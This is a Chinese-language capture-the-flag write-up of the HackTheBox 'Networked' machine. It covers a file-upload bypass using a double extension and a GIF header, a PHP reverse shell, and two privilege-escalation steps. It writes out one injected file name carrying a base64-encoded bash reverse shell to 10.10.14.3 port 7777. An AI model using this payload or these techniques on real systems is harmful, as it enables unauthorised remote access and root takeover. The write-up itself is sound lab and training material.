Networked - HackTheBox
Td

image

nmap扫描

image

image

image

访问80端口

image

扫描目录

image

uploads目录下没什么信息

image

backup目录下疑似一个备份文件

image

image

解压之后发现几个php文件,访问看看

image

image

应该是个文件上传,看看源码

image

还是个白名单上传,check_file_type函数在lib.php里面

image

会检测文件的mime类型

前面nmap扫描的时候,80端口扫描出来的中间件为apache 2.4.6版本,该版本有解析漏洞,此时我们只需要上传一个test.php.png的文件,内部包含有恶意代码,利用解析漏洞进行触发

在文件头部添加GIF89a,伪装图片格式

image

反弹shell的php文件

image

成功上传,监听一下,在访问上传文件

image

image

提权

image

提权讲究多样性,就不继续用pkexec了

image

在guly家目录下发现一个疑似定时任务的文件

image

image

该文件会每三分钟以php执行check_attack.php

image

这个文件是删除临时文件的作用,但可以将文件名与rm -f命令进行一个组合,造成反弹shell

image

将反弹命令进行一个base64编码

image

;echo -n "L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvNzc3NyAwPiYxJw=="|base64 -d|bash

此时只需要在uploads目录下创建一个名字为这个的文件即可

image

image

继续提权

image

image

这个大概意思是说,这玩意会创建一个叫guly0的网卡,如果执行这个.sh文件,则会要求输入创建的信息,如果在第一行输入xxxx /bin/bash,那么下面无论是什么内容,都会执行/bin/bash,造成提权

image